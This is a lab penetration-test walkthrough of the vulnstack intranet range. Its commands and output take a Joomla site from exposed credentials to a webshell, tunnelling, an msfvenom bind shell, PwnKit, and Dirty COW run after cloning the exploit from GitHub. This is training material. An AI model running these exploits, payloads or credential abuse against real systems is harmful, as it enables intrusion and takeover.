vulnstack Intranet Lab Penetration Test

1. Host scanning (open ports and services on the target, host operating system and version)

(1) nmap -sT 192.168.101.1/24

Nmap scan report for 192.168.101.150
Host is up (0.0010s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql
MAC Address: 00:0C:29:32:46:C9 (VMware)

(2) nmap -A 192.168.101.150

Open ports and software versions
22/tcp   open  ssh     OpenSSH 5.3 (protocol 2.0)
80/tcp   open  http    nginx 1.9.4
3306/tcp open  mysql   MySQL 5.7.27-0ubuntu0.16.04.1
Operating system version
MAC Address: 00:0C:29:32:46:C9 (VMware)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10

The banners do not belong to a single system: OpenSSH 5.3 is the build that ships with CentOS/RHEL 6, and the OS fingerprint (2.6.32 - 3.10) agrees with that, while the MySQL package string 0ubuntu0.16.04.1 comes from Ubuntu 16.04. The mismatch is a hint that port 80 and/or 3306 are proxied or forwarded to a second machine; the later steps bear this out (the shell lands on an Ubuntu 4.4.0-142 kernel at 192.168.93.120, and the SSH login to 192.168.93.100 reaches a 2.6.32-431.el6 host).

2. Web scanning (domain names and URL paths, common vulnerabilities)

(1) dirb http://192.168.101.150

---- Scanning URL: http://192.168.101.150/ ----
==> DIRECTORY: http://192.168.101.150/administrator/
==> DIRECTORY: http://192.168.101.150/bin/
==> DIRECTORY: http://192.168.101.150/cache/
==> DIRECTORY: http://192.168.101.150/components/
==> DIRECTORY: http://192.168.101.150/images/
==> DIRECTORY: http://192.168.101.150/includes/
+ http://192.168.101.150/index.php (CODE:200|SIZE:16031)
==> DIRECTORY: http://192.168.101.150/language/
==> DIRECTORY: http://192.168.101.150/layouts/
==> DIRECTORY: http://192.168.101.150/libraries/
==> DIRECTORY: http://192.168.101.150/media/
==> DIRECTORY: http://192.168.101.150/modules/
==> DIRECTORY: http://192.168.101.150/plugins/
+ http://192.168.101.150/robots.txt (CODE:200|SIZE:829)
+ http://192.168.101.150/server-status (CODE:403|SIZE:280)
==> DIRECTORY: http://192.168.101.150/templates/
==> DIRECTORY: http://192.168.101.150/tmp/

---- Entering directory: http://192.168.101.150/administrator/ ----
==> DIRECTORY: http://192.168.101.150/administrator/cache/
==> DIRECTORY: http://192.168.101.150/administrator/components/
==> DIRECTORY: http://192.168.101.150/administrator/help/
==> DIRECTORY: http://192.168.101.150/administrator/includes/
+ http://192.168.101.150/administrator/index.php (CODE:200|SIZE:5005)
==> DIRECTORY: http://192.168.101.150/administrator/language/
==> DIRECTORY: http://192.168.101.150/administrator/logs/
==> DIRECTORY: http://192.168.101.150/administrator/modules/
==> DIRECTORY: http://192.168.101.150/administrator/templates/

---- Entering directory: http://192.168.101.150/bin/ ----
+ http://192.168.101.150/bin/index.html (CODE:200|SIZE:31)

---- Entering directory: http://192.168.101.150/cache/ ----
+ http://192.168.101.150/cache/index.html (CODE:200|SIZE:31)

---- Entering directory: http://192.168.101.150/components/ ----
+ http://192.168.101.150/components/index.html (CODE:200|SIZE:31)

---- Entering directory: http://192.168.101.150/images/ ----
==> DIRECTORY: http://192.168.101.150/images/banners/
==> DIRECTORY: http://192.168.101.150/images/headers/
+ http://192.168.101.150/images/index.html (CODE:200|SIZE:31)

---- Entering directory: http://192.168.101.150/includes/ ----
+ http://192.168.101.150/includes/index.html (CODE:200|SIZE:31)

---- Entering directory: http://192.168.101.150/language/ ----
+ http://192.168.101.150/language/index.html (CODE:200|SIZE:31)

---- Entering directory: http://192.168.101.150/layouts/ ----
+ http://192.168.101.150/layouts/index.html (CODE:200|SIZE:31)
==> DIRECTORY: http://192.168.101.150/layouts/joomla/
==> DIRECTORY: http://192.168.101.150/layouts/libraries/
==> DIRECTORY: http://192.168.101.150/layouts/plugins/

---- Entering directory: http://192.168.101.150/libraries/ ----
==> DIRECTORY: http://192.168.101.150/libraries/cms/
+ http://192.168.101.150/libraries/index.html (CODE:200|SIZE:31)
==> DIRECTORY: http://192.168.101.150/libraries/joomla/
==> DIRECTORY: http://192.168.101.150/libraries/legacy/
==> DIRECTORY: http://192.168.101.150/libraries/src/
==> DIRECTORY: http://192.168.101.150/libraries/vendor/

---- Entering directory: http://192.168.101.150/media/ ----
==> DIRECTORY: http://192.168.101.150/media/cms/
==> DIRECTORY: http://192.168.101.150/media/contacts/
==> DIRECTORY: http://192.168.101.150/media/editors/
+ http://192.168.101.150/media/index.html (CODE:200|SIZE:31)
==> DIRECTORY: http://192.168.101.150/media/mailto/
==> DIRECTORY: http://192.168.101.150/media/media/
==> DIRECTORY: http://192.168.101.150/media/system/

---- Entering directory: http://192.168.101.150/modules/ ----
+ http://192.168.101.150/modules/index.html (CODE:200|SIZE:31)

---- Entering directory: http://192.168.101.150/plugins/ ----
==> DIRECTORY: http://192.168.101.150/plugins/authentication/
==> DIRECTORY: http://192.168.101.150/plugins/captcha/
==> DIRECTORY: http://192.168.101.150/plugins/content/
==> DIRECTORY: http://192.168.101.150/plugins/editors/
==> DIRECTORY: http://192.168.101.150/plugins/extension/
==> DIRECTORY: http://192.168.101.150/plugins/fields/
+ http://192.168.101.150/plugins/index.html (CODE:200|SIZE:31)
==> DIRECTORY: http://192.168.101.150/plugins/installer/
==> DIRECTORY: http://192.168.101.150/plugins/privacy/
==> DIRECTORY: http://192.168.101.150/plugins/search/
==> DIRECTORY: http://192.168.101.150/plugins/system/
==> DIRECTORY: http://192.168.101.150/plugins/user/

---- Entering directory: http://192.168.101.150/templates/ ----
+ http://192.168.101.150/templates/index.html (CODE:200|SIZE:31)
==> DIRECTORY: http://192.168.101.150/templates/system/

---- Entering directory: http://192.168.101.150/tmp/ ----
+ http://192.168.101.150/tmp/index.html (CODE:200|SIZE:31)

---- Entering directory: http://192.168.101.150/administrator/cache/ ----
+ http://192.168.101.150/administrator/cache/index.html (CODE:200|SIZE:31)

---- Entering directory: http://192.168.101.150/administrator/components/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/administrator/help/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/administrator/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/administrator/language/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/administrator/logs/ ----
+ http://192.168.101.150/administrator/logs/index.html (CODE:200|SIZE:31)

---- Entering directory: http://192.168.101.150/administrator/modules/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/administrator/templates/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/images/banners/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/images/headers/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/layouts/joomla/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/layouts/libraries/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/layouts/plugins/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/libraries/cms/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/libraries/joomla/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/libraries/legacy/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/libraries/src/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/libraries/vendor/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/media/cms/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/media/contacts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/media/editors/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/media/mailto/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/media/media/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/media/system/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/plugins/authentication/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/plugins/captcha/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/plugins/content/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/plugins/editors/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/plugins/extension/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/plugins/fields/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/plugins/installer/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/plugins/privacy/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/plugins/search/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/plugins/system/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/plugins/user/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/templates/system/ ----
==> DIRECTORY: http://192.168.101.150/templates/system/css/
==> DIRECTORY: http://192.168.101.150/templates/system/html/
==> DIRECTORY: http://192.168.101.150/templates/system/images/
+ http://192.168.101.150/templates/system/index.php (CODE:200|SIZE:0)

---- Entering directory: http://192.168.101.150/templates/system/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/templates/system/html/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/templates/system/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

(2) dirsearch -u http://192.168.101.150

[11:12:02] 403 -  280B  - /.configuration.php.swp                           
[11:12:05] 403 -  280B  - /.htaccess.bak1                                   
[11:12:05] 403 -  280B  - /.ht_wsr.txt                                      
[11:12:06] 403 -  280B  - /.htaccess.sample                                 
[11:12:06] 403 -  280B  - /.htaccess.orig
[11:12:06] 403 -  280B  - /.htaccess.save                                   
[11:12:06] 403 -  280B  - /.htaccess_extra                                  
[11:12:06] 403 -  280B  - /.htaccess_sc
[11:12:06] 403 -  280B  - /.htaccessOLD2
[11:12:06] 403 -  280B  - /.htm                                             
[11:12:06] 403 -  280B  - /.htaccessOLD
[11:12:06] 403 -  280B  - /.htaccess_orig
[11:12:06] 403 -  280B  - /.html
[11:12:06] 403 -  280B  - /.htaccessBAK                                     
[11:12:06] 403 -  280B  - /.htpasswds                                       
[11:12:06] 403 -  280B  - /.httr-oauth                                      
[11:12:06] 403 -  280B  - /.htpasswd_test                                   
[11:12:08] 403 -  280B  - /.php                                             
[11:12:13] 200 -   24KB - /1.php                                            
[11:12:13] 200 -    0B  - /2.php                                            
[11:12:38] 301 -  326B  - /administrator  ->  http://192.168.101.150/administrator/
[11:12:39] 200 -  527B  - /administrator/includes/                          
[11:12:39] 200 -   31B  - /administrator/cache/                             
[11:12:39] 301 -  331B  - /administrator/logs  ->  http://192.168.101.150/administrator/logs/
[11:12:39] 200 -   31B  - /administrator/logs/                              
[11:12:39] 200 -    2KB - /administrator/                                   
[11:12:39] 200 -    2KB - /administrator/index.php                          
[11:12:47] 200 -   31B  - /bin/                                             
[11:12:47] 301 -  316B  - /bin  ->  http://192.168.101.150/bin/             
[11:12:49] 200 -   31B  - /cache/                                           
[11:12:49] 301 -  318B  - /cache  ->  http://192.168.101.150/cache/         
[11:12:51] 200 -   31B  - /cli/                                             
[11:12:53] 301 -  323B  - /components  ->  http://192.168.101.150/components/
[11:12:53] 200 -   31B  - /components/                                      
[11:12:55] 200 -    2KB - /configuration.php~                               
[11:12:55] 200 -    0B  - /configuration.php                                
[11:13:21] 200 -    1KB - /htaccess.txt                                     
[11:13:23] 200 -   31B  - /images/                                          
[11:13:23] 301 -  319B  - /images  ->  http://192.168.101.150/images/       
[11:13:24] 200 -   31B  - /includes/                                        
[11:13:24] 301 -  321B  - /includes  ->  http://192.168.101.150/includes/   
[11:13:26] 200 -    3KB - /index.php/login/                                 
[11:13:27] 200 -    4KB - /index.php                                        
[11:13:31] 301 -  321B  - /language  ->  http://192.168.101.150/language/   
[11:13:31] 200 -   31B  - /layouts/                                         
[11:13:32] 301 -  322B  - /libraries  ->  http://192.168.101.150/libraries/ 
[11:13:32] 200 -   31B  - /libraries/                                       
[11:13:32] 200 -    7KB - /LICENSE.txt                                      
[11:13:40] 200 -   31B  - /media/                                           
[11:13:40] 301 -  318B  - /media  ->  http://192.168.101.150/media/         
[11:13:44] 301 -  320B  - /modules  ->  http://192.168.101.150/modules/     
[11:13:44] 200 -   31B  - /modules/                                         
[11:13:58] 301 -  320B  - /plugins  ->  http://192.168.101.150/plugins/     
[11:13:59] 200 -   31B  - /plugins/                                         
[11:14:04] 200 -    2KB - /README.txt                                       
[11:14:06] 200 -  392B  - /robots.txt                                       
[11:14:10] 403 -  280B  - /server-status                                    
[11:14:10] 403 -  280B  - /server-status/                                   
[11:14:24] 200 -   31B  - /templates/                                       
[11:14:24] 301 -  322B  - /templates  ->  http://192.168.101.150/templates/
[11:14:24] 200 -    0B  - /templates/beez3/                                 
[11:14:24] 200 -    0B  - /templates/protostar/                             
[11:14:24] 200 -   31B  - /templates/index.html                             
[11:14:24] 200 -    0B  - /templates/system/                                
[11:14:26] 301 -  316B  - /tmp  ->  http://192.168.101.150/tmp/             
[11:14:26] 200 -   31B  - /tmp/                                             
[11:14:41] 200 -  628B  - /web.config.txt    

(3) AppScan

(4) Acunetix

3. Filtering usable directory information

The layout (administrator/, components/, templates/protostar/, layouts/joomla/, libraries/joomla/, plus the stock README.txt, htaccess.txt and web.config.txt) identifies the site as Joomla. Of everything the scanners returned, these entries are worth following up:

http://192.168.101.150/1.php

http://192.168.101.150/configuration.php~

http://192.168.101.150/index.php/login/

http://192.168.101.150/administrator/index.php

http://192.168.101.150/templates/system/html/
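To make this filtering repeatable, here is an added Python example (my code, not part of the original write-up or of any scanner) that parses dirsearch-style result lines and returns only the entries worth a manual look, with the reason for each: editor/backup copies served as static files, credential-bearing files, files in the web root that Joomla does not ship, PHP scripts that answer with an empty body, directories whose body is not the 31-byte placeholder index.html seen throughout the dirb output, and admin/login entry points. The sample lines are constructed from the dirsearch output above; the Joomla root-file list and the heuristics are my assumptions.

```python
import re
from dataclasses import dataclass, field

# One dirsearch result line, e.g.:  [11:12:55] 200 -    2KB - /configuration.php~
LINE_RE = re.compile(
    r"^\[\d{2}:\d{2}:\d{2}\]\s+(?P<status>\d{3})\s+-\s+(?P<size>\S+)\s+-\s+(?P<path>\S+)"
)

# Suffixes that editors and admins leave behind; the web server treats them as
# static files and hands the source out verbatim instead of executing it.
BACKUP_SUFFIXES = ("~", ".bak", ".bak1", ".swp", ".orig", ".save", ".old")
# Names that hold secrets when they are readable.
SENSITIVE_PREFIXES = ("configuration.php", "config.php", ".htpasswd", ".env")
# ASSUMPTION: the files Joomla 3 ships in the web root; anything else at depth 1 was added by hand.
JOOMLA_ROOT_FILES = {"index.php", "configuration.php", "htaccess.txt", "web.config.txt",
                     "robots.txt", "README.txt", "LICENSE.txt"}
ADMIN_HINTS = ("/administrator", "/login")
# On this target every directory that is not listable answers with the same 31-byte
# placeholder index.html (see the dirb output), so any other size deserves a look.
PLACEHOLDER_SIZES = {"0B", "31B"}


@dataclass
class Finding:
    path: str
    status: int
    size: str
    reasons: list = field(default_factory=list)


def classify(path, status, size):
    """Return the reasons a result is interesting; an empty list means noise."""
    reasons = []
    if status != 200:
        return reasons
    stripped = path.rstrip("/")
    name = stripped.rsplit("/", 1)[-1]
    is_dir = path.endswith("/")
    depth = stripped.count("/")
    admin_hit = any(h in path for h in ADMIN_HINTS) and name in ("index.php", "login")
    if admin_hit:
        reasons.append("admin/login entry point")
    if any(name.endswith(s) for s in BACKUP_SUFFIXES):
        reasons.append("backup/editor copy served as a static file")
    if any(name.startswith(p) for p in SENSITIVE_PREFIXES) and name not in JOOMLA_ROOT_FILES:
        reasons.append("configuration/credential file")
    if not reasons and not is_dir and depth == 1 and name not in JOOMLA_ROOT_FILES:
        reasons.append("top-level file not shipped with Joomla")
    if name.endswith(".php") and size == "0B":
        reasons.append("script runs server-side with no output")
    if is_dir and not admin_hit and size not in PLACEHOLDER_SIZES:
        reasons.append("directory body differs from the 31-byte placeholder index.html")
    return reasons


def triage(lines):
    """Parse dirsearch output lines and keep only the interesting ones, in scan order."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        status, size, path = int(m["status"]), m["size"], m["path"]
        reasons = classify(path, status, size)
        if reasons:
            findings.append(Finding(path, status, size, reasons))
    return findings


# Constructed sample, copied from the dirsearch run above.
SAMPLE_LINES = """\
[11:12:02] 403 -  280B  - /.configuration.php.swp
[11:12:13] 200 -   24KB - /1.php
[11:12:13] 200 -    0B  - /2.php
[11:12:39] 200 -  527B  - /administrator/includes/
[11:12:39] 200 -   31B  - /administrator/cache/
[11:12:39] 200 -    2KB - /administrator/index.php
[11:12:55] 200 -    2KB - /configuration.php~
[11:12:55] 200 -    0B  - /configuration.php
[11:13:21] 200 -    1KB - /htaccess.txt
[11:13:26] 200 -    3KB - /index.php/login/
[11:14:24] 200 -   31B  - /templates/
[11:14:41] 200 -  628B  - /web.config.txt
""".splitlines()

if __name__ == "__main__":
    for f in triage(SAMPLE_LINES):
        print(f"{f.status} {f.size:>6} {f.path:<30} {'; '.join(f.reasons)}")
```

Run against the sample it keeps exactly the entries listed in this section plus /administrator/includes/ (the one directory dirsearch saw with a non-placeholder body) and drops the blanket 403s on dotfiles, which are a server deny rule rather than evidence that the file exists.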

4. Attempting to get a shell

(1) configuration.php~ exposes the database credentials. The trailing ~ marks an editor backup of Joomla's configuration.php: the real file returns an empty 200 because PHP executes it, while the backup is served as a plain static file (dirsearch shows 0B versus 2KB for the two).

public $user = 'testuser';
public $password = 'cvcvgjASD!@';
public $db = 'joomla';
public $dbprefix = 'am2zu_';

(2) Logging into the database with Navicat (MySQL on 3306 is reachable from outside, per the nmap scan) yields the system login accounts in the am2zu_users table, but the stored bcrypt hashes could not be cracked.
Instead, a small script (written in PyCharm) generates a bcrypt hash for a known password, and that hash replaces the value in the password column.

import bcrypt

# Plaintext password to set
password = '123'

# bcrypt works on bytes
password_bytes = password.encode('utf-8')

# Hash with a freshly generated salt (the library's default cost is fine here)
hashed = bcrypt.hashpw(password_bytes, bcrypt.gensalt())

# Sanity check before touching the database
assert bcrypt.checkpw(password_bytes, hashed)

# pyca bcrypt emits the "$2b$" prefix; Joomla stores "$2y$", the variant PHP writes.
# They are the same algorithm, so rewrite the prefix so the row looks like the others
# and verifies on every PHP build Joomla 3 supports.
hashed_password = hashed.decode('utf-8').replace('$2b$', '$2y$', 1)

print("Hashed password:", hashed_password)

(3) After logging into the back end, the Templates module allows code/files to be uploaded into a template directory (the files used later sit under /templates/beez3/).

Connecting with AntSword (蚁剑) succeeded, but commands could not be executed; the disable_functions bypass plugin got around that. Shell obtained.

5. Attempting to escalate to root

(1) Generate the tunnel script with Neo-reGeorg on Kali

python3 neoreg.py generate -k 123456

(2) Upload the generated tunnel.php to the web server, then on Kali run the following to bring up the forward tunnel; neoreg exposes it as a SOCKS5 proxy on 127.0.0.1:1080

python3 neoreg.py -k 123456 -u http://192.168.101.150/templates/beez3/tunnel.php

(3) Generate a bind-shell payload with msfvenom on Kali, upload it to the web server, run it and wait. rhost is 192.168.93.120, the web host's address on the 192.168.93.0/24 intranet (see the route output in section 6), so the listening port is only reachable through the tunnel

msfvenom -p linux/x64/meterpreter/bind_tcp rhost=192.168.93.120 lport=7777 -f elf -o /tmp/muma.elf

(4) In msfconsole, point Metasploit at the tunnel proxy and start the handler. With a bind payload it is the handler that connects out, so the global proxies setting is what routes that connection through neoreg

setg proxies socks5:127.0.0.1:1080

handler -p linux/x64/meterpreter/bind_tcp -H 192.168.93.120 -P 7777

(5) Enter the session and run the local exploit suggester to enumerate candidate vulnerabilities in one go

run post/multi/recon/local_exploit_suggester

(6) Use one of the exploitable vulnerabilities to obtain root

use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
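What setg proxies socks5:127.0.0.1:1080 makes the handler do is a SOCKS5 CONNECT (RFC 1928) to 192.168.93.120:7777 through the Neo-reGeorg listener, which then carries the bytes over HTTP to tunnel.php. The Python example below is added here and is not code from the original post, from Neo-reGeorg or from Metasploit: it implements the client side of that exchange and, so that it runs offline, a constructed stand-in for the proxy that speaks the server side of the handshake, records the requested destination and echoes data back instead of relaying it. The destination address and port are the ones from the msfvenom command; everything else is assumed.

```python
import socket
import struct
import threading

# SOCKS5 constants (RFC 1928).
VER, NO_AUTH, NO_ACCEPTABLE = 0x05, 0x00, 0xFF
CMD_CONNECT = 0x01
ATYP_IPV4, ATYP_DOMAIN, ATYP_IPV6 = 0x01, 0x03, 0x04
REP_SUCCEEDED, REP_CMD_NOT_SUPPORTED = 0x00, 0x07


def recv_exact(sock, n):
    """Read exactly n bytes or raise; SOCKS fields are fixed-length, so short reads matter."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed the connection mid-handshake")
        buf += chunk
    return buf


def socks5_connect(proxy, dst_host, dst_port, timeout=5.0):
    """Client side: what the msf handler does once the proxies option is set.
    Returns a socket whose bytes now flow to dst_host:dst_port via the proxy."""
    s = socket.create_connection(proxy, timeout=timeout)
    try:
        # 1. greeting: VER, NMETHODS, METHODS; we offer only "no authentication"
        s.sendall(bytes([VER, 1, NO_AUTH]))
        ver, method = recv_exact(s, 2)
        if ver != VER or method != NO_AUTH:
            raise ConnectionError(f"proxy rejected our auth methods (ver={ver:#x}, method={method:#x})")
        # 2. request: VER CMD RSV ATYP DST.ADDR DST.PORT (IPv4 form)
        s.sendall(struct.pack("!BBBB4sH", VER, CMD_CONNECT, 0, ATYP_IPV4,
                              socket.inet_aton(dst_host), dst_port))
        # 3. reply: VER REP RSV ATYP BND.ADDR BND.PORT; REP != 0 means the far end is unreachable
        ver, rep, _rsv, atyp = recv_exact(s, 4)
        if ver != VER or rep != REP_SUCCEEDED:
            raise ConnectionError(f"CONNECT to {dst_host}:{dst_port} failed, REP={rep:#x}")
        if atyp == ATYP_IPV4:
            recv_exact(s, 4 + 2)
        elif atyp == ATYP_IPV6:
            recv_exact(s, 16 + 2)
        elif atyp == ATYP_DOMAIN:
            recv_exact(s, recv_exact(s, 1)[0] + 2)
        else:
            raise ConnectionError(f"unknown ATYP {atyp:#x} in reply")
        return s
    except Exception:
        s.close()
        raise


class FakeSocks5Proxy(threading.Thread):
    """CONSTRUCTED stand-in for the Neo-reGeorg listener: parses the handshake,
    records where the client asked to go, and echoes data back instead of
    relaying it through tunnel.php."""

    def __init__(self):
        super().__init__(daemon=True)
        self.listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.listener.bind(("127.0.0.1", 0))      # ephemeral port instead of 1080
        self.listener.listen(1)
        self.addr = self.listener.getsockname()
        self.requested = None

    def run(self):
        conn, _ = self.listener.accept()
        self.listener.close()
        with conn:
            _ver, nmethods = recv_exact(conn, 2)
            methods = recv_exact(conn, nmethods)
            conn.sendall(bytes([VER, NO_AUTH if NO_AUTH in methods else NO_ACCEPTABLE]))
            if NO_AUTH not in methods:
                return
            _ver, cmd, _rsv, atyp = recv_exact(conn, 4)
            if atyp != ATYP_IPV4:                # the demo client only sends IPv4 requests
                return
            host = socket.inet_ntoa(recv_exact(conn, 4))
            port = struct.unpack("!H", recv_exact(conn, 2))[0]
            self.requested = (host, port)
            rep = REP_SUCCEEDED if cmd == CMD_CONNECT else REP_CMD_NOT_SUPPORTED
            conn.sendall(struct.pack("!BBBB4sH", VER, rep, 0, ATYP_IPV4, b"\0\0\0\0", 0))
            if rep != REP_SUCCEEDED:
                return
            while True:                          # "tunnel": echo whatever the client sends
                data = conn.recv(4096)
                if not data:
                    break
                conn.sendall(data)


def demo(dst_host="192.168.93.120", dst_port=7777):
    """Drive the full exchange against the fake proxy.
    Returns (destination the proxy was asked for, bytes that came back)."""
    proxy = FakeSocks5Proxy()
    proxy.start()
    s = socks5_connect(proxy.addr, dst_host, dst_port)
    try:
        probe = b"stage-request"                  # stands in for the stager traffic
        s.sendall(probe)
        echoed = recv_exact(s, len(probe))
    finally:
        s.close()
    proxy.join(timeout=2)
    return proxy.requested, echoed


if __name__ == "__main__":
    print(demo())
```

The practical point is in the reply check: a REP of 0x00 only means the proxy itself reached 192.168.93.120:7777, so a handler that fails here has a tunnel problem (neoreg not running, wrong key, or the bind payload not yet started), not a payload problem.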

6. Gather information on the web host and on its intranet neighbours

uname -a

Linux ubuntu 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

route

Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
192.168.93.0    *               255.255.255.0   U     0      0        0 ens33

arp -a

IP address       MAC address         Interface
---------------  ------------------  ---------
192.168.93.100   00:0c:29:32:46:d3   ens33

The shell is on an Ubuntu host whose interface ens33 sits on the 192.168.93.0/24 intranet, and the ARP cache already holds one neighbour, 192.168.93.100.

cat /root/mysql/test.txt

adduser wwwuser
passwd wwwuser_123Aqx

A note left in root's home directory: it records an account and password created for the intranet, which are reused in the next section.

7. After gaining root, intranet account credentials were found; attempt to log in with them

(1) Configure the proxy on Kali so that proxychains routes traffic through the Neo-reGeorg SOCKS5 listener. The proxychains syntax is whitespace-separated, not the socks5:host:port form used by msfconsole

vim /etc/proxychains4.conf

[ProxyList]
socks5 127.0.0.1 1080

(2) Add an SSH client config (vim /root/.ssh/config) that re-enables the legacy algorithms the OpenSSH 5.3 server on the CentOS 6 host still uses; current OpenSSH clients have dropped diffie-hellman-group1-sha1, ssh-dss, CBC ciphers and (since 8.8) ssh-rsa signatures by default. Prefer Host 192.168.93.100 over Host * so that every other connection from the Kali box keeps the secure defaults

Host *
    KexAlgorithms +diffie-hellman-group1-sha1
    HostKeyAlgorithms +ssh-dss,ssh-rsa
    PubkeyAcceptedKeyTypes +ssh-dss,ssh-rsa
    Ciphers +aes128-cbc

(3) Connect over SSH through the proxy

proxychains ssh wwwuser@192.168.93.100
(password: wwwuser_123Aqx)

(4) After connecting, gather information: the kernel is 2.6.32-431.el6.x86_64, i.e. a CentOS/RHEL 6 host

(5) That version falls inside the range affected by Dirty COW (CVE-2016-5195); fetch the exploit and use it to escalate

GitHub - firefart/dirtycow: Dirty Cow exploit - CVE-2016-5195

git clone https://github.com/firefart/dirtycow && cd dirtycow   # fetch dirty.c (a wget of the repository URL only returns GitHub's HTML page)
gcc -pthread dirty.c -o dirty -lcrypt                            # compile, on the target or on a box with a compatible glibc
./dirty                                                         # run
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password:                                  # password for the new account
Complete line:
firefart:fiRbwOlRgkx7g:0:0:pwned:/root:/bin/bash                # the race succeeded: a uid 0 account "firefart" was written into /etc/passwd

(6) Switch to that user (su firefart, with the password entered above); privilege escalation complete. The exploit rewrote /etc/passwd through the kernel race, so put the original back when finished (mv /tmp/passwd.bak /etc/passwd).
